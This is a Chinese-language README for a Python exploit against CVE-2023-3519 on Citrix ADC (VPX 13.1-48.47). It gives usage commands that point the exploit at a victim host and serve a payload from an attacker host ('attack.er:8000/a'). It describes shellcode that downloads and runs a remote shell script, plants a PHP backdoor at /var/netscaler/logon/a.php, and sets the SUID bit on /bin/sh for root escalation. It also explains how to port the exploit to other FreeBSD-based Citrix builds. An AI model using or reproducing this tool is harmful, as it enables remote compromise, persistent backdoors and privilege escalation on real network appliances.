
针对CVE-2023-3519的Python漏洞利用工具,目标为Citrix ADC,包含自定义NASM Shellcode、PHP后门部署以及SUID权限提升。
该漏洞利用针对 Citrix VPX 13.1-48.47 的地址和 shellcode。完整文章请点击此处。
需要 NASM 来构建 shellcode。
$ sudo apt install nasm
附带的 shellcode 会从远程 http(s) 服务器下载并运行一个 shell 脚本。该脚本接受3个参数:目标主机、目标端口和 shell 脚本 payload 的 URL。本仓库中包含一个示例 payload,它在清理自身之前执行 id 和 uname -a。
$ echo 'id' > a
$ python3 -m http.server &
$ python3 cve-2023-3519.py victim.com 443 attack.er:8000/a
URL 必须足够短以适合 shellcode 缓冲区,如果太长你会收到警告。
该 shellcode 会在 /var/netscaler/logon/a.php 创建一个 PHP 后门,并设置 /bin/sh 的 SUID 位。附带的 sh payload 展示了自动清理这些产物的示例。另请注意,shellcode 不会关闭其文件描述符,因此过度重复利用可能导致资源耗尽。
对于基于 FreeBSD 的 Citrix 目标,你只需要找到3个值:保存的返回指针偏移量、一个 jmp rsp ROP 工具(或等效工具,如 push rsp; ret;),以及为避免崩溃而要跳转的地址。这些参数都在 cve-2023-3519.py 顶部附近硬编码。